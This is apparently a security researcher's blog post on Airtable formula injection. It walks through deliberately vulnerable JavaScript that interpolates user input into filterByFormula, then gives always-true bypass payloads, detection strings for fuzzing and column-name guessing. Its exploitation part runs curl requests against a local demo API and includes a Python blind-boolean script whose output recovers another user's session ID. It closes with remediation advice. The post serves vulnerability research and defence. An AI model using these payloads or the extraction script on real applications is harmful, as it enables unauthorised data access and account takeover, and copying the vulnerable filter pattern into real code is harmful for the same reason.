This article discusses Airtable Formula injection, a vulnerability that occurs when untrusted input is included in an Airtable formula. We’ll cover the vulnerability fundamentals, detection, exploitation and some thoughts on remediation.
TL;DR: If you’re using Airtable as a database backend for your application and directly incorporating user input into formula filters, you may be exposing yourself to a vulnerability similar to SQL injection. This allows attackers to manipulate formulas and potentially access unauthorised data. While input validation and escaping can mitigate the issue, complete protection against this kind of attack is challenging.
During a recent web application security review, I stumbled across something interesting - an Airtable integration serving as the application’s backend database. Airtable is a lot of things, but for our purposes it’s a friendly web interface to a database. There are a bunch of libraries that let you talk to it, and occasionally someone will use this as a data source for their web application.
One thing Airtable is apparently not good at is providing a secure method to filter rows you’re querying using the official client libraries. Airtable uses its own formula language to filter rows, the SQL equivalent would be writing a WHERE
clause.
If the web application is blindly including user input into the formula used for filtering, you can potentially exploit this to bypass access controls or exfiltrate data. Airtable don’t seem to document this issue and while there is some discussion on their forums, it’s not yet a widely known problem. Possibly because no one has really dug into the impact and shown how it can be exploited, so let’s do that!
Airtable Integration
Typically we’d see something like this JavaScript, but it could be any language which talks to Airtable using the filterByFormula
or similar functionality.
// Get email from user input const { email } = req.query; // Initial config and auth Airtable.configure({ endpointUrl: 'https://api.airtable.com', apiKey: 'YOURKEYHERE' }); var base = Airtable.base('BASEIDHERE'); // Pull records from Airtable const records = await base('User Profiles') .select({ filterByFormula: `{Email Address} = '${email}'`, // <-- FILTER }) .all();
Imagine this is part of a web app, we’re grabbing user input and using string interpolation to include it in our filtering formula. E.g. if the user enters an email address, it’ll return all contacts with that email.
What if things get a little more complex?
// Pull records from Airtable const records = await base('User Profiles') .select({ filterByFormula: `AND({Tenancy ID} = 99, SEARCH("${name}", {Full Name}))`, }) .all();
In this case we’re doing a search on the contact’s name, but also limiting results to the tenant with ID 99, because apparently we’re crazy enough to build a multi-tenanted web app with Airtable as the database.
Aside: doing multitenancy by filtering records like this is really easy to get wrong or forget, but that’s a whole other article I haven’t written yet
Exploitation
There are two things we can achieve by injecting into these formula:
- Access control bypass - we want to see data we shouldn’t, e.g. another tenant’s data
- Data exfiltration - this code is only supposed to return email addresses, but maybe there’s more juicy data in that table
Airtable document their formula syntax, which is a useful reference. The key thing for us is the formula parser is fairly permissive, which we can abuse in some fun and unexpected ways.
Basic Access Control Bypass
A table row will be returned if the formula evaluates to true for that row. So the first thing we want to do is cause the formula to always evaluate to true.
Consider this:
filterByFormula: `{User Id} = '${user_guid}'`,
In this example, imagine the web app is looking up the current user’s info with an unguessable GUID (a common pattern). We have full control of ${user_guid}
as this is user input. Also note that GUID is surrounded by single quotes in the forumla so we’re injecting into a string context. If you’re used to SQL injection, this will start to feel very familiar.
There’s a quirk with the formula parser which allows us to compare strings to strings and/or numbers and get a true/false result even when it’s not part of the expected equality comparison. Check this out:
{User ID} = ''=''
This forumla should probably not work but it does and evaluates to true on every row of the table. It’s not totally clear to me why, but the ''=''
seems to be the key part that the formula resolves to and email address equality check no longer matters.
Now keep in mind you probably only control some of the formula, so you have to inject into an existing one. In this example, we have an API we’re exploiting where the important part looks like this:
// Get user input const { user_guid } = req.body; // Build filter and exec const records = await base('User Profiles') .select({ filterByFormula: `{User ID} = '${user_guid}'`, }) .all();
We can then make a HTTP request with a user_guid
POST parameter. If that parameter was say, aaabbb
, then the API will build a formula like so:
{User ID} = 'aaabbb'
Which will return nothing because the GUIDS are unguessable (this time) and that isn’t one.
Let’s use a simple bypass, if we set the parameter we’re sending to '='
then it’ll build a formula that looks exactly how we want:
{User ID} = ''=''
As an empty string always equals an empty string, the formula will resolve to true on every row in the table and will return all User Profiles. Nice.
There are variants to play with as well:
{User ID} = ''=0
{User ID} = ''=""
{User ID} = ''>-9999999999
{User ID} = ''>'-9999999999'
{User ID} = ''&RECORD_ID()
RECORD_ID returns the current row’s unique ID, so will always match true IF you’re matching on the column that holds this ID anyway. The & is string concatenation.
There are a lot of potential permutations and I definitely have not explored all of them, but that should give you enough to get a feel for it.
Guessing Column Names
I haven’t been able to find anything equivalent to the old mysql information_schema technique where you could query the database for all tables and column names. In fact, I haven’t found a way to target other bases or tables at all. So we’ll have to stick to targeting the current table and resort to brute force methods for now.
We can use a blind boolean technique to guess if a column name exists or not. There are a bunch of ways to do this, and you might have to get creative with the specific application you’re exploiting, but let’s work through one approach.
Using our API endpoint from before, we can inject to build a formula that comes out to look like this:
{User ID} = ''&{GUESS-9456123}&''
So our user_guid
POST parameter will be:
'&{GUESS-9456123}&'
This results in a formula which concatenates empty strings with whatever is in the column called {GUESS-9456123}. Note that the curly brackets indicate a column name. Obviously that column won’t exist so if we’re lucky we’ll get a nice easy to read error response:
Uncaught AirtableError {
error: 'INVALID_FILTER_BY_FORMULA',
message: 'The formula for filtering records is invalid: Unknown field names: guess-9456123',
statusCode: 422
}
Or maybe we’ll just get a HTTP 500 status or something from the API. Either way we now know what a “column doesn’t exist” response looks like. Next we can build a wordlist, try them all, and anything that doesn’t return an error is very probably a valid column name we can target later.
Column names by convention are in the following format: {Email Address}
, {First Name}
, {Contact ID}
etc. They don’t have to be capitalised words with spaces, but that seems to be the common convention.
Notice in the error message above GUESS-9456123 has been made lowercase? Column names are case insensitive which makes our brute force job easier.
Vulnerability Detection
Now that you’ve got a handle on how this injection broadly works, let’s go over how some ideas on how to find it when you don’t have source code.
Look for references to Airtable (obviously), formula
, filter_by_formula
, and strings that look like Airtable columns User Id
instead of user_id
.
If you’re testing in string contexts, try concatenation and see how the application responds.
Potentially valid formula injections:
"&RECORD_ID()&"
'&RECORD_ID()&'
Invalid formula:
"&DOESNT_EXIST()&"
'&DOESNT_EXIST()&'
We’re trying both string types, double and single quoted. RECORD_ID()
will always return a string, so if we can concat that to empty strings and get no Airtable related errors then the input we’re testing might be vulnerable to injection. If you get an error or different output using the invalid formulas when compared to valid formulas then that helps point towards this input probably being injectable.
For numeric contexts:
1+RECORD_ID()
1+DOESNT_EXIST()
Same deal - the 1st one doesn’t return an error and the 2nd does or the response is suspiciously different, then it’s possibly injectable.
All of these are good payloads to add to your input fuzzing wordlists and may well work for Airtable clones that use similar formula syntax too. Don’t forget to throw in the simple string bypasses as well:
''=''
""=""
'='
"="
Vulnerability hunting is a combination of trying different inputs and analysing (or “triaging”) outliers in the responses. Try use the information above and the HTTP response information (status codes, contents, timing, etcetera) to determine whether an input is likely vulnerable to Airtable injection. Once you are fairly confident that you have found an Airtable injection vulnerability, you can move onto…
Looting - Part One, More Access Controls
This is where things can get complex. If you’re lucky, you might have source code or a verbose error message which leaks the formula you’re injecting into, if not then I hope you’re ready for a bunch of pain and guesswork.
So at this stage we know we have a formula injection vector, and we’ve brute-forced a bunch of column names. How do we get at the data in those columns?
The obvious answer is to find an API endpoint that normally returns that data but has access controls that normally work. Let’s say there’s an API endpoint that uses this formula to limit who can see what:
AND({Tenancy ID} = 99, SEARCH("${name}", {Full Name}))
As an attacker, we control ${name}
but not {Tenancy ID} = 99
, but this is no good because we want to access other tenants’ info right?
There’s a neat trick which works when we’re stuck in function like AND/OR, we can use some unexpected parsing around --
. Now I’m not 100% sure if --
has a legitimate purpose in this context but it allows us to break up AND/OR logical operators, for some reason.
If we can make our filter look like this then we win:
AND({Tenancy ID} = 99, SEARCH("","") -- OR(1=1, SEARCH("", {Full Name}))
The actual thing you’d inject into the ${name}
parameter would be:
","") -- OR(1=1, SEARCH("
For some reason having AND() -- OR()
means the AND function no longer matters, which removes the tenancy ID check. We’re then injecting our own OR which will always evaluate to true for everything because of the 1=1
. Neat.
Looting - Part 2 Blind
What about if you can’t find an API endpoint that returns the data, but you want it. You want it real bad.
In this case we can run a blind boolean attack which allows us to extract data from any column in the current table. At a high level, you want to do this:
- Limit the formula to evaluate to true on a single row at a time, and target one column for that row.
- Isolate the 1st character in the cell and take a guess on what it might be.
- If the guess is right, record that and move on to the 2nd character
- If it isn’t right, keep on guessing until it is.
Aside: I pulled this off on a production application (which is why you’re getting this article) to steal one bit of PII as a proof of concept and it took me two solid days to go from “I wonder if Airtable formula injection is a thing, no one is really talking about it” to extracting one small bit of PII using this blind boolean attack. It’s not easy but it is a fun challenge. At the time of publication, the info on this page is state-of-the-art (I think) but the state-of-the-art is pretty bad and I’d love to see someone else pick it up and file off the rough edges.
Anyway… imagine we have an API endpoint that looks like this:
app.post('/api/email', async (req, res) => { try { const { session } = req.body; const records = await base('Contacts').select({ filterByFormula: `{User Session} = '${session}'` }).all(); if (records.length != 1) { return res.json({ email: null }); } res.json({ email: records[0].fields['Email Address'] }); } catch (error) { res.status(500).json({ error: error.message }); } });
This takes a session ID from a POST request and returns the current user’s email address. In this scenario we know what our session ID is, but we want to find other people’s session IDs so we can access their account and data.
A legitimate request/response will look like this:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d '{"session": "a1481122-463e-40cd-bd5b-09478bd909dd"}'; echo
{"email":"[email protected]"}
We’re sending a session ID GUID and getting back our email address to confirm we’re logged in.
Let’s use a bypass trick from before:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'='"}
EOF
)"; echo
{"email":null}
Note I’m using a fun bash syntax here with the cat
and EOF
, this is just so we don’t have to deal with bash string escaping. Just know that anything between the EOFs it sent in the POST body verbatim. It’s fine, don’t worry about it.
Doing this we get an “email is null” response, which is… not what we want. This either means our bypass failed for some reason, or more likely the API will only return an email in the response if records.length != 1
and our bypass trick matches EVERYTHING so records is larger than 1. Damn.
Alright, so this is where the real fun begins. The formula we’re injecting into looks like this:
{User Session} = 'INJECTION'
Let’s make it look like this as a place to start:
{User Session} = ''&if(1=1,'a1481122-463e-40cd-bd5b-09478bd909dd','')&''
What we’re doing is taking empty strings and concatenating our known session ID in the middle, if 1=1 (which is alway true). Our actual curl cmd will look like this:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'&if(1=1,'a1481122-463e-40cd-bd5b-09478bd909dd','')&'"}
EOF
)"; echo
{"email":"[email protected]"}
Which has returned our email address. So we have a payload that doesn’t give us anything new BUT is valid and works. If we switch the 1=1 to 1=2:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'&if(1=2,'a1481122-463e-40cd-bd5b-09478bd909dd','')&'"}
EOF
)"; echo
{"email":null}
We get null back, which is progress! It means by using the IF formula function we can execute true/false logic inside Airtable. This is the basis of our blind boolean based exploit.
Either through code review or brute force guessing we know we want to target the {User Session}
column and we also know this should contain a bunch of lowercase GUIDs (because we can see our own). So our next step should be to guess someone else’s GUID so let’s use our IF logic do something more useful than 1=1
, like this:
LEFT({User Session}, 1) = 'b'
We’re now grabbing the 1st character of {User Session}
and testing if it’s a b
, if we put that in our previous injection payload it’ll give us… nothing again. It’s trying to match a session that starts with b AND ALSO equals our known session token which does not start with b
. We can get around this by checking if the current row’s session token starts with b
and is equal to itself, check it out:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'&if(LEFT({User Session}, 1) = 'd',{User Session},'')&'"}
EOF
)"; echo
{"email":"[email protected]"}
Oh boy, suddenly we can see someone else’s email address. Their session must start with a d
, that’s progress. Keep in mind though, we’re lucky that there is only a single user record with a session starting with d
, if there were multiple then we’d just get a null back which would mean either no sessions or multiple. A straightforward way to get around this is to brute force guess the prefix until we get an email address returned, so try a
, then aa
, then ab
, ac
, etc.
Anyway, we now have an email address which is unique in this table (probably), so let’s include that in our formula so we can avoid accidentally matching on multiple rows and screwing everything up.
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'&if(AND({Email Address} = '[email protected]', LEFT({User Session}, 1) = 'd'),{User Session},'')&'"}
EOF
)"; echo
{"email":"[email protected]"}
Still works, phew. Next we want to start brute force guessing each character of the session GUID. So let’s guess it starts with da
, note that the number in LEFT is now 2 meaning grab the first two characters:
$ curl -X POST http://localhost:3000/api/email -H "Content-Type: application/json" -d "$(cat <<EOF
{"session": "'&if(AND({Email Address} = '[email protected]', LEFT({User Session}, 2) = 'da'),{User Session},'')&'"}
EOF
)"; echo
{"email":null}
The null response means nope, incorrect. It’s at this point we have the bones of working exploit, so we can work it by hand which sounds awful or write a python script:
import requests import string def try_prefix(email, prefix): payload = { "session": f"'&if(AND( = '{email}', LEFT(, {len(prefix)}) = '{prefix}'),,'')&'" } response = requests.post( 'http://localhost:3000/api/email', json=payload ) return response.json().get('email') is not None def find_session_guid(email): known_prefix = 'd' # We know it starts with 'd' from previous tests chars = string.ascii_lowercase + string.digits + '-' while len(known_prefix) < 36: # GUIDs are 36 characters long found = False for c in chars: test_prefix = known_prefix + c if try_prefix(email, test_prefix): known_prefix = test_prefix print(f"Found prefix: {known_prefix}") found = True break if not found: print(f"Failed to find next character after {known_prefix}") break return known_prefix if __name__ == "__main__": target_email = "[email protected]" print(f"Starting brute force for email: {target_email}") session_guid = find_session_guid(target_email) print(f"\nFinal result: {session_guid}")
And the output:
$ time python session_brute.py
Starting brute force for email: [email protected]
Found prefix: df
Found prefix: df0
Found prefix: df05
Found prefix: df057
Found prefix: df057e
Found prefix: df057e6
Found prefix: df057e6a
Found prefix: df057e6a-
Found prefix: df057e6a-5
Found prefix: df057e6a-55
Found prefix: df057e6a-55a
Found prefix: df057e6a-55a5
Found prefix: df057e6a-55a5-
Found prefix: df057e6a-55a5-4
Found prefix: df057e6a-55a5-40
Found prefix: df057e6a-55a5-409
Found prefix: df057e6a-55a5-4091
Found prefix: df057e6a-55a5-4091-
Found prefix: df057e6a-55a5-4091-a
Found prefix: df057e6a-55a5-4091-a2
Found prefix: df057e6a-55a5-4091-a2d
Found prefix: df057e6a-55a5-4091-a2d7
Found prefix: df057e6a-55a5-4091-a2d7-
Found prefix: df057e6a-55a5-4091-a2d7-0
Found prefix: df057e6a-55a5-4091-a2d7-0a
Found prefix: df057e6a-55a5-4091-a2d7-0a7
Found prefix: df057e6a-55a5-4091-a2d7-0a7f
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e2
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e24
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e246
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e246e
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e246e0
Found prefix: df057e6a-55a5-4091-a2d7-0a7f3e246e03
Final result: df057e6a-55a5-4091-a2d7-0a7f3e246e03
real 4m12.488s
user 0m1.221s
sys 0m0.283s
That wasn’t super fast but just over four minutes to take over an account ain’t so bad. We could apply this idea to any column we know the name of and slowly extract it.
I have done this using a binary search instead of guessing chars one by one as you can do stuff like 'aa'<'bb'
and it’s much faster, but also much more prone to complications and failure. There’s also multithreading I guess.
I haven’t developed a general exploit for this brand of injection vulnerability, someone will have to advance the techniques before this becomes easy to exploit (e.g. sqlmap). If you’re looking for a research project, maybe this is for you, or maybe I’ll pick it up again after a break. Who knows!
Remediation
How do we protect against this? The real fix for an injection vulnerability is to prevent confusion in the formula parser around what is code and what is data. With SQL we have parameterized queries which provide clear separation of what is data (e.g. user input) and what is code (e.g. SQL logic), but this doesn’t seem possible with the current Airtable implementation.
Ideally Airtable would provide some guidance and release APIs and client code that is secure by default against this kind of attack. In the meantime we can paper over the cracks.
Input Validation
Make sure the user input fits the expected shape. For something like a GUID, it’s a really well defined data type so making sure the session ID POST parameter contains only a GUID is easy enough to strongly validate. However, if the data you’re accepting doesn’t match a well defined data type (e.g. a personal bio, international shipping details, etc) then this approach starts to fall apart.
Output Escaping
Airtable formulas do allow escaping of characters that we need for injection, but to get this right you have to be super careful because the escaping is slightly different for the two string types, numeric types don’t really fit with this approach, and don’t even get me started on unicode best-fit issues.
For example, if your formula looks like this:
{User Bio} = 'INJECTION'
Then if you prepend every single quote with a \ (e.g. a ‘ is turned into this \’) then getting out of that string context as an attacker will be difficult. Similar for double quotes.
But what about:
{User Code} = INJECTION
The user code is a 4 digit PIN, the string escaping above complicates an exploit but really isn’t solid. In this case I’d go back to input validation and make sure any input is in fact a 4 digit PIN before sending it off to Airtable as part of a formula. If you’re expecting any kind of numbers, then a whitelist of allowed characters (0-9.) might be your best option.
Remediation is specific to each app and data type, and that is practically hard to get right for every single potentially vulnerable input. If you get regular pentesting, it’d definitely something I’d raise with the tester. Good luck!